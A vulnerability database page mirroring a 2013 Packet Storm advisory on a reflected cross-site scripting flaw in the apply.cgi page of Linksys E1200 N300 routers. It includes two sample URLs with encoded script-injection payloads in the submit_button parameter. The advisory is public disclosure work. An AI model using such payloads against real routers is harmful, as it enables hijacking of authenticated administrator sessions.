Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCarl BenedictPACKETSTORM:122342
HistoryJul 10, 2013 - 12:00 a.m.

Cisco Linksys E1200 / N300 Cross Site Scripting

2013-07-1000:00:00
Carl Benedict
packetstormsecurity.com
16

0.008 Low

EPSS

Percentile

79.6%

JSON
`Summary  
--------------------  
Software : Cisco/Linksys Router OS  
Hardware : E1200 N300 (others currently untested)  
Version : 2.0.04 (others currently untested)  
Website : http://www.linksys.com  
Issue : Reflected XSS  
Severity : Medium  
Researcher: Carl Benedict (theinfinitenigma)  
  
Product Description  
--------------------  
The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.  
  
Details  
--------------------  
The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.  
  
Sample URL #1 (HTTP GET request):  
  
http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27  
  
Sample URL #2 (HTTP GET request):  
  
http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1  
  
History  
--------------------  
04/26/2013 : Discovery  
04/27/2013 : Advisory released  
`

Related

cve 1
prion 1
securityvulns 2
packetstorm 1
exploitpack 1
exploitdb 1
cve
cve
CVE-2013-2679
2020-02-18 17:15:00
prion
prion
Cross site scripting
2020-02-18 17:15:00
securityvulns
securityvulns
Re: Cisco/Linksys E1200 N300 Reflected XSS
2013-07-15 00:00:00
Linksys routers security vulnerabilities
2013-07-15 00:00:00
packetstorm
packetstorm
Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion
2013-05-07 00:00:00
exploitpack
exploitpack
Cisco Linksys E4200 - Multiple Vulnerabilities
2013-05-07 00:00:00
exploitdb
exploitdb
Cisco Linksys E4200 - Multiple Vulnerabilities
2013-05-07 00:00:00

0.008 Low

EPSS

Percentile

79.6%

JSON
Related for PACKETSTORM:122342
cve1prion1securityvulns2packetstorm1exploitpack1exploitdb1